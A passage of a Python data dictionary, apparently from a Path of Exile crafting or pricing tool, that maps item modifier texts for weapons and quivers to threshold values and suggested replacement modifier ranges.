"#% chance to gain Onslaught for 4 seconds on Kill": [(22, '(3 - 4)% increased Attack Speed'), (50, '(5 - 6)% increased Attack Speed')],
"#% chance to gain a Power, Frenzy or Endurance Charge on Kill": [(18, '(8 - 11)% increased Endurance Charge Duration\n(8 - 11)% increased Frenzy Charge Duration\n(8 - 11)% increased Power Charge Duration'), (36, '(12 - 15)% increased Endurance Charge Duration\n(12 - 15)% increased Frenzy Charge Duration\n(12 - 15)% increased Power Charge Duration'), (100, '(5 - 10)% chance to gain an Endurance Charge on Kill\n(5 - 10)% chance to gain a Frenzy Charge on Kill\n(5 - 10)% chance to gain a Power Charge on Kill')],
"#% increased Attack Speed": [(30, '(3 - 4)% increased Attack Speed'), (50, '(5 - 6)% increased Attack Speed'), (100, '(7 - 8)% increased Attack Speed')],
"#% increased Attack Speed while a Rare or Unique Enemy is Nearby": [(30, '(3 - 4)% increased Attack Speed'), (100, '(5 - 6)% increased Attack Speed')],
"#% increased Bleeding Duration": [(20, '(14 - 18)% increased Damage with Bleeding'), (40, '(19 - 23)% increased Damage with Bleeding'), (100, '(24 - 28)% increased Damage with Bleeding\n(8 - 12)% increased Bleeding Duration')],
"#% increased Chaos Damage": [(75, '(18 - 20)% increased Chaos Damage'), (150, '(21 - 23)% increased Chaos Damage'), (500, '(24 - 26)% increased Chaos Damage')],
"#% increased Cold Damage": [(100, '(18 - 20)% increased Cold Damage'), (160, '(21 - 23)% increased Cold Damage'), (220, '(24 - 26)% increased Cold Damage'), (280, '(27 - 30)% increased Cold Damage'), (1000, '(10 - 15)% increased Frostbite Curse Effect')],
"#% increased Critical Strike Chance": [(25, '(5 - 6)% increased Critical Strike Chance'), (50, '(7 - 8)% increased Critical Strike Chance'), (75, '(9 - 10)% increased Critical Strike Chance'), (100, '(11 - 12)% increased Critical Strike Chance'), (200, '(13 - 15)% increased Critical Strike Chance')],
"#% increased Critical Strike Chance for Spells": [(100, '(29 - 31)% increased Critical Strike Chance for Spells'), (175, '(32 - 34)% increased Critical Strike Chance for Spells'), (250, '(35 - 37)% increased Critical Strike Chance for Spells'), (325, '(38 - 41)% increased Critical Strike Chance for Spells'), (500, '(42 - 45)% increased Critical Strike Chance for Spells')],
"#% increased Damage per Endurance Charge": [(10, '2% increased Damage per Endurance Charge'), (50, '(3 - 4)% increased Damage per Endurance Charge')],
"#% increased Damage per Frenzy Charge": [(10, '2% increased Damage per Frenzy Charge'), (50, '(3 - 4)% increased Damage per Frenzy Charge')],
"#% increased Damage per Power Charge": [(10, '2% increased Damage per Power Charge'), (50, '(3 - 4)% increased Damage per Power Charge')],
"#% increased Damage when on Full Life": [(70, '(15 - 18)% increased Damage'), (140, '(19 - 22)% increased Damage'), (500, '(23 - 26)% increased Damage')],
"#% increased Damage with Bleeding": [(45, '(14 - 18)% increased Damage with Bleeding'), (90, '(19 - 23)% increased Damage with Bleeding'), (200, '(24 - 28)% increased Damage with Bleeding\nBleeding you inflict deals Damage (15 - 20)% faster')],
"#% increased Damage with Poison": [(45, '(14 - 18)% increased Damage with Poison'), (90, '(19 - 23)% increased Damage with Poison'), (200, '(24 - 28)% increased Damage with Poison\nPoisons you inflict deal Damage (15 - 20)% faster')],
"#% increased Elemental Damage": [(70, '(17 - 19)% increased Elemental Damage'), (140, '(20 - 22)% increased Elemental Damage'), (500, '(23 - 26)% increased Elemental Damage\nDamage Penetrates (3 - 5)% Elemental Resistances')],
"#% increased Elemental Damage with Attack Skills": [(50, 'Attacks with this Weapon Penetrate 2% Elemental Resistances'), (100, 'Attacks with this Weapon Penetrate 3% Elemental Resistances'), (300, 'Attacks with this Weapon Penetrate (4 - 5)% Elemental Resistances')],
"#% increased Fire Damage": [(100, '(18 - 20)% increased Fire Damage'), (160, '(21 - 23)% increased Fire Damage'), (220, '(24 - 26)% increased Fire Damage'), (280, '(27 - 30)% increased Fire Damage'), (1000, '(10 - 15)% increased Flammability Curse Effect')],
"#% increased Light Radius": [(20, '10% increased Light Radius'), (30, '12% increased Light Radius'), (35, '15% increased Light Radius'), (100, '15% increased Light Radius\nKilled Enemies Explode, dealing 3% of their Life as Physical Damage')],
"#% increased Lightning Damage": [(100, '(18 - 20)% increased Lightning Damage'), (160, '(21 - 23)% increased Lightning Damage'), (220, '(24 - 26)% increased Lightning Damage'), (280, '(27 - 30)% increased Lightning Damage'), (1000, '(10 - 15)% increased Conductivity Curse Effect')],
"#% increased Physical Damage": [(200, '(13 - 14)% increased Physical Damage'), (400, '(15 - 16)% increased Physical Damage'), (600, '(17 - 19)% increased Physical Damage'), (725, '(20 - 22)% increased Physical Damage'), (1000, '(23 - 25)% increased Physical Damage')],
"#% increased Poison Duration": [(20, '(14 - 18)% increased Damage with Poison'), (40, '(19 - 23)% increased Damage with Poison'), (100, '(24 - 28)% increased Damage with Poison\n(8 - 12)% increased Poison Duration')],
"#% increased Spell Damage": [(90, '(16 - 18)% increased Spell Damage'), (180, '(19 - 22)% increased Spell Damage'), (270, '(23 - 26)% increased Spell Damage'), (300, '(31 - 35)% increased Spell Damage'), (1000, 'Spells have a (8 - 10)% chance to deal Double Damage')],
"#% increased Stun Duration on Enemies": [(50, '(15 - 17)% increased Stun Duration on Enemies'), (300, '(26 - 35)% increased Stun Duration on Enemies')],
"#% of Energy Shield Regenerated per second if you've Hit an Enemy Recently": [(0.67, '(4 - 5)% increased maximum Energy Shield'), (1.33, '(6 - 7)% increased maximum Energy Shield'), (8.33, '(8 - 10)% increased maximum Energy Shield')],
"#% of Mana Regenerated per second if you've Hit an Enemy Recently": [(0.42, '(22 - 24)% increased Mana Regeneration Rate'), (0.83, '(25 - 27)% increased Mana Regeneration Rate'), (1.67, '(28 - 30)% increased Mana Regeneration Rate\n0.2% of Mana Regenerated per second')],
"#% of Physical Attack Damage Leeched as Life": [(0.4, '0.2% of Physical Attack Damage Leeched as Life'), (0.7, '0.3% of Physical Attack Damage Leeched as Life'), (1.0, '0.4% of Physical Attack Damage Leeched as Life'), (4.0, '1.5% of Physical Attack Damage Leeched as Life')],
"#% of Physical Attack Damage Leeched as Mana": [(0.4, '0.1% of Physical Attack Damage Leeched as Mana'), (0.7, '0.2% of Physical Attack Damage Leeched as Mana'), (1.0, '0.3% of Physical Attack Damage Leeched as Mana'), (4.0, '0.5% of Physical Attack Damage Leeched as Mana')],
"#% reduced Attribute Requirements": [(60, '(6 - 7) to all Attributes'), (70, '(8 - 9) to all Attributes'), (85, '(10 - 12) to all Attributes'), (100, '(10 - 12) to all Attributes\n(5 - 10)% chance to gain an Endurance Charge on Kill'), (100, '(5 - 10)% chance to gain a Frenzy Charge on Kill')],
"#% reduced Enemy Stun Threshold": [(30, '(5 - 6)% reduced Enemy Stun Threshold'), (35, '(7 - 8)% reduced Enemy Stun Threshold'), (200, '(9 - 10)% reduced Enemy Stun Threshold')],
"#% reduced Soul Cost of Vaal Skills": [(25, 'Vaal Skills deal (25 - 30)% increased Damage'), (50, 'Vaal Skills deal (31 - 35)% increased Damage'), (100, '(40 - 50)% increased Attack Damage if Corrupted')],
"+# Life gained for each Enemy hit by your Attacks": [(4, '(4 - 5) Life gained for each Enemy hit by your Attacks'), (7, '(6 - 8) Life gained for each Enemy hit by your Attacks'), (10, '(9 - 15) Life gained for each Enemy hit by your Attacks'), (15, '(25 - 30) Life gained for each Enemy hit by your Attacks')],
"+# to Accuracy Rating": [(500, '(10 - 15)% increased Global Accuracy Rating'), (1000, '(20 - 25)% increased Global Accuracy Rating'), (2000, '(30 - 35)% increased Global Accuracy Rating')],
"+# to Armour if you've Hit an Enemy Recently": [(600, '(7 - 9)% increased Armour'), (1200, '(10 - 12)% increased Armour'), (5000, '(13 - 15)% increased Armour')],
"+# to Dexterity": [(40, '(6 - 8) to Dexterity'), (70, '(9 - 11) to Dexterity'), (100, '(12 - 14) to Dexterity'), (130, '(15 - 17) to Dexterity'), (160, '(18 - 20) to Dexterity'), (200, 'Adds (1 - 2) to (3 - 4) Cold Damage to Attacks with this Weapon per 10 Dexterity')],
"+# to Dexterity and Intelligence": [(20, '(6 - 8) to Dexterity\n(6 - 8) to Intelligence'), (45, '(9 - 11) to Dexterity\n(9 - 11) to Intelligence'), (100, '(12 - 14) to Dexterity\n(12 - 14) to Intelligence')],
"+# to Evasion Rating if Hit an Enemy Recently": [(600, '(7 - 9)% increased Evasion Rating'), (1200, '(10 - 12)% increased Evasion Rating'), (5000, '(13 - 15)% increased Evasion Rating')],
"+# to Level of Socketed Chaos Gems": [(3, '(2 - 3) to Quality of Socketed Chaos Gems'), (5, '(4 - 6) to Quality of Socketed Chaos Gems'), (10, '1 to Level of Socketed Chaos Gems')],
"+# to Level of Socketed Cold Gems": [(3, '(2 - 3) to Quality of Socketed Cold Gems'), (5, '(4 - 6) to Quality of Socketed Cold Gems'), (10, '1 to Level of Socketed Cold Gems')],
"+# to Level of Socketed Dexterity Gems": [(1, '(2 - 3) to Quality of Socketed Dexterity Gems'), (2, '(4 - 6) to Quality of Socketed Dexterity Gems'), (5, '1 to Level of Socketed Dexterity Gems')],
"+# to Level of Socketed Fire Gems": [(3, '(2 - 3) to Quality of Socketed Fire Gems'), (5, '(4 - 6) to Quality of Socketed Fire Gems'), (10, '1 to Level of Socketed Fire Gems')],
"+# to Level of Socketed Gems": [(1, '(2 - 3) to Quality of Socketed Gems'), (2, '(4 - 6) to Quality of Socketed Gems'), (10, '1 to Level of Socketed Gems')],
"+# to Level of Socketed Intelligence Gems": [(1, '(2 - 3) to Quality of Socketed Intelligence Gems'), (2, '(4 - 6) to Quality of Socketed Intelligence Gems'), (5, '1 to Level of Socketed Intelligence Gems')],
"+# to Level of Socketed Lightning Gems": [(3, '(2 - 3) to Quality of Socketed Lightning Gems'), (5, '(4 - 6) to Quality of Socketed Lightning Gems'), (10, '1 to Level of Socketed Lightning Gems')],
"+# to Level of Socketed Melee Gems": [(3, '(2 - 3) to Quality of Socketed Melee Gems'), (5, '(4 - 6) to Quality of Socketed Melee Gems'), (10, '1 to Level of Socketed Melee Gems')],
"+# to Level of Socketed Strength Gems": [(1, '(2 - 3) to Quality of Socketed Strength Gems'), (2, '(4 - 6) to Quality of Socketed Strength Gems'), (5, '1 to Level of Socketed Strength Gems')],
"+# to Level of Socketed Support Gems": [(3, '(2 - 3) to Quality of Socketed Support Gems'), (5, '(4 - 6) to Quality of Socketed Support Gems'), (10, '1 to Level of Socketed Support Gems')],
"+# to Strength": [(40, '(6 - 8) to Strength'), (70, '(9 - 11) to Strength'), (100, '(12 - 14) to Strength'), (130, '(15 - 17) to Strength'), (160, '(18 - 20) to Strength'), (200, 'Adds (1 - 2) to (3 - 4) Fire Damage to Attacks with this Weapon per 10 Strength')],
"+# to Strength and Dexterity": [(20, '(6 - 8) to Strength\n(6 - 8) to Dexterity'), (45, '(9 - 11) to Strength\n(9 - 11) to Dexterity'), (100, '(12 - 14) to Strength\n(12 - 14) to Dexterity')],
"+# to Strength and Intelligence": [(20, '(6 - 8) to Strength\n(6 - 8) to Intelligence'), (45, '(9 - 11) to Strength\n(9 - 11) to Intelligence'), (100, '(12 - 14) to Strength\n(12 - 14) to Intelligence')],
"+# to Weapon range": [(7, '1 to Weapon range'), (20, '2 to Weapon range')],
"+# to all Attributes": [(15, '(6 - 8) to Strength\n(6 - 8) to Dexterity\n(6 - 8) to Intelligence'), (30, '(9 - 11) to Strength\n(9 - 11) to Dexterity\n(9 - 11) to Intelligence'), (50, '(12 - 14) to Strength\n(12 - 14) to Dexterity\n(12 - 14) to Intelligence')],
"+#% Critical Strike Multiplier while a Rare or Unique Enemy is Nearby": [(40, '(15 - 17) to Global Critical Strike Multiplier'), (80, '(18 - 20) to Global Critical Strike Multiplier'), (150, '(21 - 23) to Global Critical Strike Multiplier')],
"+#% to Chaos Resistance": [(35, '(5 - 6) to Chaos Resistance'), (70, '(7 - 8) to Chaos Resistance'), (120, '(9 - 10) to Chaos Resistance')],
"+#% to Cold Resistance": [(50, '8 to Cold Resistance'), (75, '(9 - 10) to Cold Resistance'), (100, '(11 - 12) to Cold Resistance'), (125, '(13 - 14) to Cold Resistance'), (150, '(15 - 16) to Cold Resistance')],
"+#% to Cold and Chaos Resistances": [(35, '8 to Cold Resistance\n(5 - 6) to Chaos Resistance'), (100, '(9 - 10) to Cold Resistance\n(7 - 8) to Chaos Resistance')],
"+#% to Cold and Lightning Resistances": [(20, '8 to Cold Resistance\n8 to Lightning Resistance'), (40, '(9 - 10) to Cold Resistance\n(9 - 10) to Lightning Resistance'), (100, '(11 - 12) to Cold Resistance\n(11 - 12) to Lightning Resistance')],
"+#% to Fire Resistance": [(50, '8 to Fire Resistance'), (75, '(9 - 10) to Fire Resistance'), (100, '(11 - 12) to Fire Resistance'), (125, '(13 - 14) to Fire Resistance'), (150, '(15 - 16) to Fire Resistance')],
"+#% to Fire and Chaos Resistances": [(35, '8 to Fire Resistance\n(5 - 6) to Chaos Resistance'), (100, '(9 - 10) to Fire Resistance\n(7 - 8) to Chaos Resistance')],
"+#% to Fire and Cold Resistances": [(20, '8 to Fire Resistance\n8 to Cold Resistance'), (40, '(9 - 10) to Fire Resistance\n(9 - 10) to Cold Resistance'), (100, '(11 - 12) to Fire Resistance\n(11 - 12) to Cold Resistance')],
"+#% to Fire and Lightning Resistances": [(20, '8 to Fire Resistance\n8 to Lightning Resistance'), (40, '(9 - 10) to Fire Resistance\n(9 - 10) to Lightning Resistance'), (100, '(11 - 12) to Fire Resistance\n(11 - 12) to Lightning Resistance')],
"+#% to Global Critical Strike Multiplier": [(25, '(15 - 17) to Global Critical Strike Multiplier'), (50, '(18 - 20) to Global Critical Strike Multiplier'), (75, '(21 - 23) to Global Critical Strike Multiplier'), (100, '(24 - 26) to Global Critical Strike Multiplier'), (200, '(27 - 30) to Global Critical Strike Multiplier')],
"+#% to Lightning Resistance": [(50, '8 to Lightning Resistance'), (75, '(9 - 10) to Lightning Resistance'), (100, '(11 - 12) to Lightning Resistance'), (125, '(13 - 14) to Lightning Resistance'), (150, '(15 - 16) to Lightning Resistance')],
"+#% to Lightning and Chaos Resistances": [(35, '8 to Lightning Resistance\n(5 - 6) to Chaos Resistance'), (100, '(9 - 10) to Lightning Resistance\n(7 - 8) to Chaos Resistance')],
"+#% to Quality of Socketed Gems": [(20, '(2 - 3) to Quality of Socketed Gems'), (50, '(4 - 6) to Quality of Socketed Gems')],
"Adds # to # Chaos Damage": [(200, 'Adds (4 - 9) to (11 - 21) Chaos Damage'), (320, 'Adds (10 - 18) to (22 - 34) Chaos Damage'), (1000, 'Adds (19 - 28) to (35 - 49) Chaos Damage')],
"Adds # to # Cold Damage": [(50, 'Adds (3 - 6) to (7 - 11) Cold Damage'), (100, 'Adds (7 - 10) to (12 - 18) Cold Damage'), (150, 'Adds (11 - 15) to (19 - 26) Cold Damage'), (200, 'Adds (16 - 20) to (27 - 35) Cold Damage'), (1000, 'Adds (21 - 25) to (36 - 43) Cold Damage')],
"Adds # to # Cold Damage to Spells": [(60, 'Adds (3 - 5) to (5 - 8) Cold Damage to Spells'), (120, 'Adds (5 - 7) to (9 - 13) Cold Damage to Spells'), (160, 'Adds (8 - 11) to (14 - 19) Cold Damage to Spells'), (180, 'Adds (12 - 14) to (19 - 25) Cold Damage to Spells'), (1000, 'Adds (15 - 18) to (26 - 31) Cold Damage to Spells')],
"Adds # to # Fire Damage": [(80, 'Adds (4 - 8) to (9 - 15) Fire Damage'), (160, 'Adds (9 - 12) to (16 - 23) Fire Damage'), (210, 'Adds (13 - 18) to (24 - 31) Fire Damage'), (250, 'Adds (19 - 24) to (32 - 43) Fire Damage'), (1000, 'Adds (25 - 30) to (44 - 53) Fire Damage')],
"Adds # to # Fire Damage to Spells": [(75, 'Adds (3 - 6) to (7 - 11) Fire Damage to Spells'), (150, 'Adds (7 - 9) to (12 - 17) Fire Damage to Spells'), (200, 'Adds (10 - 13) to (17 - 22) Fire Damage to Spells'), (230, 'Adds (14 - 17) to (23 - 31) Fire Damage to Spells'), (1000, 'Adds (18 - 21) to (31 - 38) Fire Damage to Spells')],
"Adds # to # Lightning Damage": [(150, 'Adds 1 to (16 - 25) Lightning Damage'), (300, 'Adds (1 - 2) to (26 - 40) Lightning Damage'), (375, 'Adds (1 - 3) to (41 - 55) Lightning Damage'), (430, 'Adds (2 - 5) to (56 - 70) Lightning Damage'), (1000, 'Adds (2 - 6) to (71 - 83) Lightning Damage')],
"Adds # to # Lightning Damage to Spells": [(100, 'Adds 1 to (12 - 18) Lightning Damage to Spells'), (200, 'Adds (1 - 2) to (19 - 28) Lightning Damage to Spells'), (300, 'Adds (1 - 3) to (29 - 39) Lightning Damage to Spells'), (370, 'Adds (2 - 4) to (40 - 49) Lightning Damage to Spells'), (1000, 'Adds (2 - 5) to (50 - 59) Lightning Damage to Spells')],
"Adds # to # Physical Damage": [(40, 'Adds 1 to 2 Physical Damage'), (80, 'Adds (2 - 3) to (3 - 4) Physical Damage'), (120, 'Adds (3 - 4) to (5 - 6) Physical Damage'), (135, 'Adds (5 - 6) to (7 - 8) Physical Damage'), (500, 'Adds (6 - 7) to (9 - 10) Physical Damage')],
"Attacks with this Weapon Penetrate #% Chaos Resistance": [(22, '(15 - 17)% increased Chaos Damage'), (44, '(18 - 20)% increased Chaos Damage'), (100, '(21 - 23)% increased Chaos Damage')],
"Attacks with this Weapon Penetrate #% Elemental Resistances": [(22, '(17 - 19)% increased Elemental Damage'), (44, '(20 - 22)% increased Elemental Damage'), (100, '(23 - 26)% increased Elemental Damage\nAttacks with this Weapon Penetrate 3% Elemental Resistances')],
"Auras from your Skills grant #% increased Damage to you and Allies": [(3, 'You and Allies affected by your Aura Skills deal (7 - 9)% increased Damage'), (5, 'You and Allies affected by your Aura Skills deal (10 - 12)% increased Damage'), (20, 'You and Allies affected by your Aura Skills deal (13 - 15)% increased Damage')],
"Curse Enemies with Level # Despair on Hit": [(11, '(18 - 20)% increased Chaos Damage'), (22, '(21 - 23)% increased Chaos Damage'), (50, '(24 - 26)% increased Chaos Damage')],
"Damage Penetrates #% Cold Resistance": [(11, '(21 - 23)% increased Cold Damage'), (22, '(24 - 26)% increased Cold Damage'), (50, '(27 - 30)% increased Cold Damage')],
"Damage Penetrates #% Fire Resistance": [(11, '(21 - 23)% increased Fire Damage'), (22, '(24 - 26)% increased Fire Damage'), (50, '(27 - 30)% increased Fire Damage')],
"Damage Penetrates #% Lightning Resistance": [(11, '(21 - 23)% increased Lightning Damage'), (22, '(24 - 26)% increased Lightning Damage'), (50, '(27 - 30)% increased Lightning Damage')],
"Gain #% of Cold Damage as Extra Chaos Damage": [(16, '(21 - 23)% increased Cold Damage'), (32, '(24 - 26)% increased Cold Damage'), (100, '(27 - 30)% increased Cold Damage\nGain (4 - 6)% of Cold Damage as Extra Chaos Damage')],
"Gain #% of Fire Damage as Extra Chaos Damage": [(16, '(21 - 23)% increased Fire Damage'), (32, '(24 - 26)% increased Fire Damage'), (100, '(27 - 30)% increased Fire Damage\nGain (4 - 6)% of Fire Damage as Extra Chaos Damage')],
"Gain #% of Lightning Damage as Extra Chaos Damage": [(16, '(21 - 23)% increased Lightning Damage'), (32, '(24 - 26)% increased Lightning Damage'), (100, '(27 - 30)% increased Lightning Damage\nGain (4 - 6)% of Lightning Damage as Extra Chaos Damage')],
"Gain #% of Non-Chaos Damage as extra Chaos Damage": [(5, '(15 - 17)% increased Chaos Damage'), (10, '(18 - 20)% increased Chaos Damage'), (50, '(21 - 23)% increased Chaos Damage')],
"Gain #% of Physical Damage as Extra Chaos Damage": [(16, '(19 - 22)% increased Global Physical Damage'), (32, '(23 - 26)% increased Global Physical Damage'), (100, '(27 - 30)% increased Global Physical Damage\nGain (4 - 6)% of Physical Damage as Extra Chaos Damage')],
"Has 1 Abyssal Socket": [(1, '(15 - 20)% increased Damage against Abyssal Monsters'), (2, '(21 - 25)% increased Damage against Abyssal Monsters'), (5, '25% increased Effect of Socketed Jewels')],
"Hits can't be Evaded": [(1, '(10 - 15)% increased Global Accuracy Rating'), (2, '(20 - 25)% increased Global Accuracy Rating'), (5, '(30 - 35)% increased Global Accuracy Rating\n100% increased Global Accuracy Rating')],
"Minions deal #% increased Damage": [(90, 'Minions deal (19 - 22)% increased Damage'), (140, 'Minions deal (27 - 32)% increased Damage'), (180, 'Minions deal (23 - 26)% increased Damage'), (280, 'Minions deal (33 - 38)% increased Damage'), (500, 'Minions deal (27 - 30)% increased Damage'), (500, 'Minions deal (39 - 44)% increased Damage')],
"Socketed Skills deal #% more Attack Damage": [(44, '(23 - 26)% increased Attack Damage'), (88, '(27 - 30)% increased Attack Damage'), (200, '(31 - 35)% increased Attack Damage')],
"Socketed Skills deal #% more Spell Damage": [(44, '(23 - 26)% increased Spell Damage'), (88, '(27 - 30)% increased Spell Damage'), (200, '(31 - 35)% increased Spell Damage')],
"Triggers Level 20 Spectral Spirits when Equipped": [(4, 'Minions deal (11 - 12)% increased Damage'), (7, 'Minions deal (13 - 14)% increased Damage'), (20, 'Minions deal (15 - 16)% increased Damage')],
"Your Hits inflict Decay, dealing 500 Chaos Damage per second for 8 seconds": [(1, '(15 - 17)% increased Chaos Damage'), (2, '(18 - 20)% increased Chaos Damage'), (10, '(21 - 23)% increased Chaos Damage')],
},
"Quiver": {
"# to # Cold Damage per Frenzy Charge": [(10, '(11 - 12)% increased Cold Damage'), (15, '(13 - 14)% increased Cold Damage'), (50, '(15 - 16)% increased Cold Damage\n4 to 7 Cold Damage per Frenzy Charge')],
"#% additional Physical Damage Reduction": [(6, '(-15 - -11) Physical Damage taken from Attacks'), (12, '(-20 - -16) Physical Damage taken from Attacks'), (50, '(-25 - -21) Physical Damage taken from Attacks')],
"#% chance to Avoid Cold Damage when Hit": [(14, '(11 - 12) to Cold Resistance'), (27, '(13 - 14) to Cold Resistance'), (50, '(15 - 16) to Cold Resistance\n(3 - 5)% chance to Avoid Cold Damage when Hit')],
"#% chance to Avoid Fire Damage when Hit": [(14, '(11 - 12) to Fire Resistance'), (27, '(13 - 14) to Fire Resistance'), (50, '(15 - 16) to Fire Resistance\n(3 - 5)% chance to Avoid Fire Damage when Hit')],
"#% chance to Avoid Lightning Damage when Hit": [(14, '(11 - 12) to Lightning Resistance'), (27, '(13 - 14) to Lightning Resistance'), (50, '(15 - 16) to Lightning Resistance\n(3 - 5)% chance to Avoid Lightning Damage when Hit')],
"#% chance to gain a Frenzy Charge when you Hit a Rare or Unique Enemy": [(6, '3% increased Attack Speed'), (12, '4% increased Attack Speed'), (50, '5% increased Attack Speed\n(5 - 10)% chance to gain a Frenzy Charge on Kill')],
"#% increased Attack Speed": [(30, '3% increased Attack Speed'), (35, '4% increased Attack Speed'), (100, '5% increased Attack Speed')],
"#% increased Attack and Cast Speed": [(15, '4% increased Attack and Cast Speed'), (50, '5% increased Attack and Cast Speed')],
"#% increased Damage with Poison": [(50, '(10 - 11)% increased Damage with Poison'), (100, '(12 - 13)% increased Damage with Poison'), (200, '(14 - 15)% increased Damage with Poison\n(8 - 12)% increased Poison Duration')],
"#% increased Elemental Damage if you've dealt a Critical Strike Recently": [(30, '(11 - 12)% increased Elemental Damage'), (60, '(13 - 14)% increased Elemental Damage'), (100, '(15 - 16)% increased Elemental Damage')],
"#% increased Elemental Damage with Attack Skills": [(40, '(12 - 13)% increased Elemental Damage with Attack Skills'), (80, '(14 - 15)% increased Elemental Damage with Attack Skills'), (115, '(16 - 18)% increased Elemental Damage with Attack Skills'), (130, '(19 - 21)% increased Elemental Damage with Attack Skills'), (200, '(22 - 24)% increased Elemental Damage with Attack Skills\nGain (8 - 10)% of Physical Damage as Extra Damage of a random Element')],
"#% increased Global Critical Strike Chance": [(40, '(26 - 28)% increased Global Critical Strike Chance'), (70, '(29 - 31)% increased Global Critical Strike Chance'), (90, '(32 - 34)% increased Global Critical Strike Chance'), (105, '(35 - 37)% increased Global Critical Strike Chance'), (300, '(38 - 40)% increased Global Critical Strike Chance')],
"#% increased Projectile Speed": [(40, '(9 - 10)% increased Projectile Speed'), (80, '(11 - 12)% increased Projectile Speed'), (115, '(13 - 14)% increased Projectile Speed'), (135, '(15 - 17)% increased Projectile Speed'), (200, '(18 - 20)% increased Projectile Speed\nBow Attacks fire an additional Arrow')],
"#% increased Stun Duration on Enemies": [(50, '(15 - 17)% increased Stun Duration on Enemies'), (300, '(18 - 25)% increased Stun Duration on Enemies\n(20 - 25)% increased Area of Effect if you have Stunned an Enemy Recently')],
"#% increased Vaal Skill Critical Strike Chance": [(170, '(21 - 30)% increased Vaal Skill Critical Strike Chance'), (340, '(31 - 40)% increased Vaal Skill Critical Strike Chance'), (500, '(40 - 50)% increased Global Critical Strike Chance if Corrupted')],
"#% increased maximum Mana": [(35, '(15 - 19) to maximum Mana'), (70, '(20 - 24) to maximum Mana'), (150, '(25 - 30) to maximum Mana\n(7 - 8)% increased maximum Mana')],
"#% of Life Regenerated per second": [(1.17, '(11.68 - 18.33) Life Regenerated per second'), (2.33, '(18.35 - 26.67) Life Regenerated per second'), (5.0, '(26.68 - 40.0) Life Regenerated per second\n(0.6 - 0.7)% of Life Regenerated per second')],
"#% of Physical Attack Damage Leeched as Life": [(0.7, '(13 - 16)% increased Damage while Leeching Life'), (1.0, '(17 - 21)% increased Damage while Leeching Life'), (4.0, '(22 - 25)% increased Damage while Leeching Life')],
"#% of Physical Attack Damage Leeched as Mana": [(0.4, '0.1% of Physical Attack Damage Leeched as Mana'), (0.7, '0.2% of Physical Attack Damage Leeched as Mana'), (0.7, '(13 - 16)% increased Damage while Leeching Mana'), (1.0, '0.3% of Physical Attack Damage Leeched as Mana'), (1.0, '(17 - 21)% increased Damage while Leeching Mana'), (4.0, '(22 - 25)% increased Damage while Leeching Mana')],
"#% reduced Reflected Damage taken": [(11, '(8 - 5)% reduced Reflected Damage taken'), (22, '(12 - 9)% reduced Reflected Damage taken'), (50, '(15 - 13)% reduced Reflected Damage taken')],
"+# Life gained on Kill": [(15, '(6 - 8) Life gained on Kill'), (25, '(9 - 11) Life gained on Kill'), (35, '(12 - 15) Life gained on Kill'), (100, '(12 - 15) Life gained on Kill\nRecover (1 - 2)% of Maximum Life on Kill')],
"+# Mana gained on Kill": [(5, '3 Mana gained on Kill'), (10, '4 Mana gained on Kill'), (15, '5 Mana gained on Kill'), (50, '5 Mana gained on Kill\nRecover (1 - 2)% of Maximum Mana on Kill')],
"+# to Accuracy Rating": [(250, '(10 - 11)% increased Global Accuracy Rating'), (500, '(12 - 13)% increased Global Accuracy Rating'), (750, '(14 - 15)% increased Global Accuracy Rating'), (1000, '(16 - 17)% increased Global Accuracy Rating'), (2000, 'Arrows Pierce an additional Target')],
"+# to Armour and Evasion Rating": [(350, '(7 - 9)% increased Armour\n(7 - 9)% increased Evasion Rating'), (700, '(10 - 12)% increased Armour\n(10 - 12)% increased Evasion Rating'), (1500, '(13 - 15)% increased Armour\n(13 - 15)% increased Evasion Rating')],
"+# to Dexterity": [(40, '(6 - 8) to Dexterity'), (70, '(9 - 11) to Dexterity'), (100, '(12 - 14) to Dexterity'), (130, '(15 - 17) to Dexterity'), (160, '(18 - 20) to Dexterity'), (200, '(18 - 20) to Dexterity\n(5 - 10)% chance to gain a Frenzy Charge on Kill')],
"+# to Dexterity and Intelligence": [(20, '(6 - 8) to Dexterity\n(6 - 8) to Intelligence'), (45, '(9 - 11) to Dexterity\n(9 - 11) to Intelligence'), (100, '(12 - 14) to Dexterity\n(12 - 14) to Intelligence')],
"+# to Evasion Rating": [(150, '(7 - 9)% increased Evasion Rating'), (300, '(10 - 12)% increased Evasion Rating'), (450, '(13 - 15)% increased Evasion Rating'), (1000, '(13 - 15)% increased Evasion Rating\n(16 - 25)% chance to Avoid Elemental Ailments')],
"+# to Intelligence": [(40, '(6 - 8) to Intelligence'), (70, '(9 - 11) to Intelligence'), (100, '(12 - 14) to Intelligence'), (130, '(15 - 17) to Intelligence'), (160, '(18 - 20) to Intelligence'), (200, '(18 - 20) to Intelligence\n5% increased Intelligence')],
"+# to Strength": [(40, '(6 - 8) to Strength'), (70, '(9 - 11) to Strength'), (100, '(12 - 14) to Strength'), (130, '(15 - 17) to Strength'), (160, '(18 - 20) to Strength'), (200, '(18 - 20) to Strength\n5% increased Strength')],
"+# to Strength and Dexterity": [(20, '(6 - 8) to Strength\n(6 - 8) to Dexterity'), (45, '(9 - 11) to Strength\n(9 - 11) to Dexterity'), (100, '(12 - 14) to Strength\n(12 - 14) to Dexterity')],
"+# to Strength and Intelligence": [(20, '(6 - 8) to Strength\n(6 - 8) to Intelligence'), (45, '(9 - 11) to Strength\n(9 - 11) to Intelligence'), (100, '(12 - 14) to Strength\n(12 - 14) to Intelligence')],
"+# to all Attributes": [(15, '(6 - 8) to Strength\n(6 - 8) to Dexterity\n(6 - 8) to Intelligence'), (30, '(9 - 11) to Strength\n(9 - 11) to Dexterity\n(9 - 11) to Intelligence'), (50, '(12 - 14) to Strength\n(12 - 14) to Dexterity\n(12 - 14) to Intelligence')],
"+# to maximum Energy Shield": [(50, '(8 - 9)% increased Energy Shield Recharge Rate'), (100, '(10 - 11)% increased Energy Shield Recharge Rate'), (130, '(12 - 15)% increased Energy Shield Recharge Rate'), (500, '(12 - 15)% increased Energy Shield Recharge Rate\n0.3% of Spell Damage Leeched as Energy Shield')],
"+# to maximum Life": [(200, '4% increased maximum Life'), (280, '(5 - 6)% increased maximum Life'), (1000, '(7 - 8)% increased maximum Life')],
"+#% Chaos Resistance against Damage Over Time": [(50, '(5 - 6) to Chaos Resistance'), (100, '(7 - 8) to Chaos Resistance'), (200, '(9 - 10) to Chaos Resistance\n1 to maximum Chaos Resistance')],
